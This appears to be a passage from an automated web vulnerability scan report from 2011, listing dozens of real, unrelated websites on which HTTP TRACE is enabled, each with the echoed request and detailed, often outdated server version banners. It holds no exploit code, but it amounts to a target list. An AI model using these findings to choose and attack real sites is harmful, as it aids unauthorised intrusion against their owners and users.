Cookie: 21d7cf893a5d1a4c


24.260. http://www.corral.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corral.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.corral.net
Cookie: ce0065442d927d51

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.corral.net
Cookie: ce0065442d927d51


24.261. http://www.corvetteactioncenter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corvetteactioncenter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.corvetteactioncenter.com
Cookie: de01807dc500046e

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.corvetteactioncenter.com
Cookie: de01807dc500046e


24.262. http://www.coshoctoncountyfair.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coshoctoncountyfair.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coshoctoncountyfair.org
Cookie: d288e3bd8092e958

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:56 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coshoctoncountyfair.org
Cookie: d288e3bd8092e958


24.263. http://www.costcentral.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.costcentral.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.costcentral.com
Cookie: 264695c9634e761c

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:05 GMT
Server: Apache/2.2.16 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.costcentral.com
Cookie: 264695c9634e761c


24.264. http://www.countryplans.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countryplans.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.countryplans.com
Cookie: 7d7f633b6a574b55

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.countryplans.com
Cookie: 7d7f633b6a574b55


24.265. http://www.coupon-blowout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupon-blowout.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coupon-blowout.com
Cookie: 27d378936e4400a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coupon-blowout.com
Cookie: 27d378936e4400a


24.266. http://www.couponfeed.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponfeed.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.couponfeed.net
Cookie: a8fcd8f1b09224a8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.couponfeed.net
Cookie: a8fcd8f1b09224a8


24.267. http://www.crackfound.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crackfound.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crackfound.com
Cookie: 7683e618fdcb7767

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:46:23 GMT
Server: Apache/2.2.3 (Debian) mod_perl/2.0.2 Perl/v5.8.8 mod_antiloris/0.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crackfound.com
Cookie: 7683e618fdcb7767


24.268. http://www.craigsolomon.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigsolomon.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.craigsolomon.net
Cookie: caa8bee8aa802180

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:42 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.craigsolomon.net
Cookie: caa8bee8aa802180
X-Forwarded-For: 173.193.214.243
Connection-IsSecure: No


24.269. http://www.crazy-tattoo-designs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazy-tattoo-designs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crazy-tattoo-designs.com
Cookie: be3a35880a7228ee

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crazy-tattoo-designs.com
Cookie: be3a35880a7228ee


24.270. http://www.crazyblogs.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazyblogs.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crazyblogs.net
Cookie: ee6da449ac247bda

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ee6da449ac247bda
Host: www.crazyblogs.net


24.271. http://www.credit-land.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.credit-land.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.credit-land.com
Cookie: 64c1dc051fa69397

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.credit-land.com
Cookie: 64c1dc051fa69397


24.272. http://www.creditimprovers.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditimprovers.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.creditimprovers.net
Cookie: a4f647d314f8d93a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: Coyote-2-c0a88791=a0c0019:0; path=/

TRACE / HTTP/1.0
Host: www.creditimprovers.net
Cookie: a4f647d314f8d93a


24.273. http://www.croatiantimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.croatiantimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.croatiantimes.com
Cookie: 8072ab32d1a54e5

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:46:44 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ruby/1.2.6 Ruby/1.8.7(2008-08-11) mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.croatiantimes.com
Cookie: 8072ab32d1a54e5


24.274. http://www.crystalebony.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crystalebony.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crystalebony.com
Cookie: a3e2a6b1c6da8c11

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:56 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a3e2a6b1c6da8c11
Host: www.crystalebony.com


24.275. http://www.csa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csa.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.csa.com
Cookie: d8726f764bee1ae2

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:15 GMT
Server: Apache/2.2.6 (Unix) PHP/5.1.2 proxy_html/2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.csa.com
Cookie: d8726f764bee1ae2


24.276. http://www.csaceliacs.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csaceliacs.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.csaceliacs.org
Cookie: 6174f47af979a0a7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:23 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6174f47af979a0a7
Host: www.csaceliacs.org


24.277. http://www.csicop.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csicop.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.csicop.org
Cookie: c680c3079a88e1a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:53:00 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.csicop.org
Cookie: c680c3079a88e1a


24.278. http://www.culpeperschools.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.culpeperschools.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.culpeperschools.org
Cookie: 8a5ddebf23c2f7a3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:25:47 GMT
MicrosoftOfficeWebServer: 5.0_Pub
Content-Type: message/http
Content-Length: 77

TRACE / HTTP/1.0
Host: www.culpeperschools.org
Cookie: 8a5ddebf23c2f7a3


24.279. http://www.cultural-china.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cultural-china.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cultural-china.com
Cookie: 84f3b06531057aba

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 10:40:09 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_ssl/2.2.17 OpenSSL/1.0.0c PHP/5.3.5 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cultural-china.com
Cookie: 84f3b06531057aba


24.280. http://www.cumaholicteen.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cumaholicteen.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cumaholicteen.net
Cookie: dea974f6635926bf

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:13 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dea974f6635926bf
Host: www.cumaholicteen.net


24.281. http://www.customweather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customweather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.customweather.com
Cookie: c2048d3d045b363a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:05 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Content-Type: message/http
Via: 1.0 www.customweather.com
X-Server-Name: lb2
Connection: close

TRACE / HTTP/1.1
Host: www.customweather.com
Cookie: c2048d3d045b363a
Via: 1.0 www.customweather.com
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.customweather.com
X-Forwarded-Server: www.customweather.com
Connection: Keep-Alive


24.282. http://www.cute-mary.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cute-mary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cute-mary.com
Cookie: bffb658ba14ba809

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:13 GMT
Server: Apache/1.3.36 (Unix) PHP/5.1.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: bffb658ba14ba809
Host: www.cute-mary.com


24.283. http://www.cute-sandy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cute-sandy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cute-sandy.com
Cookie: 13ba31bb0968d443

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:21 GMT
Server: Apache/1.3.36 (Unix) PHP/5.1.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 13ba31bb0968d443
Host: www.cute-sandy.com


24.284. http://www.cyber-seek.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyber-seek.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cyber-seek.com
Cookie: 455b8d4b580ec523

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cyber-seek.com
Cookie: 455b8d4b580ec523


24.285. http://www.dabbledb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dabbledb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dabbledb.com
Cookie: e92b441b64eafae6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:40 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.11 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e92b441b64eafae6
Host: www.dabbledb.com


24.286. http://www.dailycomedy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailycomedy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dailycomedy.com
Cookie: 3bc7378558346931

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:53 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dailycomedy.com
Cookie: 3bc7378558346931


24.287. http://www.dailyorange.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyorange.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dailyorange.com
Cookie: 71dc9055c52cc8f4

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:13 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dailyorange.com
Cookie: 71dc9055c52cc8f4


24.288. http://www.dancewithshadows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dancewithshadows.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dancewithshadows.com
Cookie: 8b2c7e15eb393e82

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dancewithshadows.com
Cookie: 8b2c7e15eb393e82


24.289. http://www.danielleftv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.danielleftv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.danielleftv.com
Cookie: 445b0218257ab5ae

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 445b0218257ab5ae
Host: www.danielleftv.com


24.290. http://www.danielpipes.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.danielpipes.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.danielpipes.org
Cookie: 36a1a4c4cc10a1b2

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:12 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.danielpipes.org
Cookie: 36a1a4c4cc10a1b2


24.291. http://www.dastelefonbuch.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dastelefonbuch.de
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dastelefonbuch.de
Cookie: 9ff368ed4908270f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dastelefonbuch.de
Cookie: 9ff368ed4908270f


24.292. http://www.datamark.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datamark.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.datamark.com
Cookie: 3efb01bf6ab4768b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 21:56:29 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerWebFarm=1107427850.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.datamark.com
Cookie: 3efb01bf6ab4768b


24.293. http://www.dateofun.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dateofun.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dateofun.com
Cookie: 3cd6e414a5a490e0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:36 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dateofun.com
Cookie: 3cd6e414a5a490e0


24.294. http://www.dawnofnations.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dawnofnations.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dawnofnations.com
Cookie: 783d0192fbb89571

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dawnofnations.com
Cookie: 783d0192fbb89571


24.295. http://www.dbrl.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbrl.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dbrl.org
Cookie: c00637a370046490

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:58 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dbrl.org
Cookie: c00637a370046490


24.296. http://www.dealerrevs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealerrevs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dealerrevs.com
Cookie: 6b39d4f43d965f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:31 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dealerrevs.com
Cookie: 6b39d4f43d965f


24.297. http://www.dealsea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealsea.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dealsea.com
Cookie: 5acb1c6759a8981

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:01 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dealsea.com
Cookie: 5acb1c6759a8981


24.298. http://www.deanguitars.tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deanguitars.tv
Path:   /

Request

TRACE / HTTP/1.0
Host: www.deanguitars.tv
Cookie: 5e4b285dcc77da13

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:05 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.9 FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5e4b285dcc77da13
Host: www.deanguitars.tv


24.299. http://www.deanza.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deanza.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.deanza.edu
Cookie: f975697bf772fee8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.deanza.edu
Cookie: f975697bf772fee8


24.300. http://www.deanzadrivein.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deanzadrivein.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.deanzadrivein.com
Cookie: b6946a45cf59f50d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:08 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.5 FrontPage/5.0.2.2510 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b6946a45cf59f50d
Host: www.deanzadrivein.com


24.301. http://www.deepthroatlove6.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deepthroatlove6.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.deepthroatlove6.com
Cookie: 66c0cba5fbdb6c69

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:40 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.deepthroatlove6.com
Cookie: 66c0cba5fbdb6c69


24.302. http://www.deguate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deguate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.deguate.com
Cookie: ad75988ce3e7ff11

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.deguate.com
Cookie: ad75988ce3e7ff11


24.303. http://www.delaware.coop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delaware.coop
Path:   /

Request

TRACE / HTTP/1.0
Host: www.delaware.coop
Cookie: 414f034dd7156dff

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.delaware.coop
Cookie: 414f034dd7156dff


24.304. http://www.devilsmature.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.devilsmature.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.devilsmature.com
Cookie: 9c1483692f2420bb

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:56 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9c1483692f2420bb
Host: www.devilsmature.com


24.305. http://www.dex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dex.com
Cookie: 455f9e64a1050d69

Response

HTTP/1.1 200 OK
Content-Type: message/http
Connection: Close
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=90246999813,0)
Content-Length: 89
Date: Wed, 04 May 2011 03:33:15 GMT

TRACE / HTTP/1.1
Connection: Keep-Alive
Cookie: 455f9e64a1050d69
Host: www.dex.com


24.306. http://www.diethealthclub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diethealthclub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.diethealthclub.com
Cookie: 562d39d3e98cd2bc

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:10 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.diethealthclub.com
Cookie: 562d39d3e98cd2bc


24.307. http://www.digitalhome.ca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalhome.ca
Path:   /

Request

TRACE / HTTP/1.0
Host: www.digitalhome.ca
Cookie: 423c23561a7052e7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:00 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.digitalhome.ca
Cookie: 423c23561a7052e7


24.308. http://www.dildos-hd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dildos-hd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dildos-hd.com
Cookie: a0f660cc7d373b5

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dildos-hd.com
Cookie: a0f660cc7d373b5


24.309. http://www.dinkytown.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dinkytown.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dinkytown.net
Cookie: b2195589aad035d6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:24 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b2195589aad035d6
Host: www.dinkytown.net


24.310. http://www.dip.jp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dip.jp
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dip.jp
Cookie: ea6a6c961f7e76db

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ea6a6c961f7e76db
Host: www.dip.jp


24.311. http://www.divavillage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.divavillage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.divavillage.com
Cookie: d8d2af11aed9408d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:36 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.divavillage.com
Cookie: d8d2af11aed9408d


24.312. http://www.dizzed.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dizzed.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dizzed.com
Cookie: 4d77eb314ff1e817

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dizzed.com
Cookie: 4d77eb314ff1e817


24.313. http://www.dja.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dja.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dja.com
Cookie: 1a009e963e2a2b0d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dja.com
Cookie: 1a009e963e2a2b0d


24.314. http://www.do512.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.do512.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.do512.com
Cookie: 701f632fb495e3fa

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:33 GMT
Server: Apache/2.2.9 (Ubuntu) Phusion_Passenger/3.0.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.do512.com
Cookie: 701f632fb495e3fa


24.315. http://www.doctorsmedical.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doctorsmedical.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.doctorsmedical.net
Cookie: 64c702352ed62f1a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:50 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.doctorsmedical.net
Cookie: 64c702352ed62f1a


24.316. http://www.doi.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doi.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.doi.gov
Cookie: df14c0549e801eb9

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
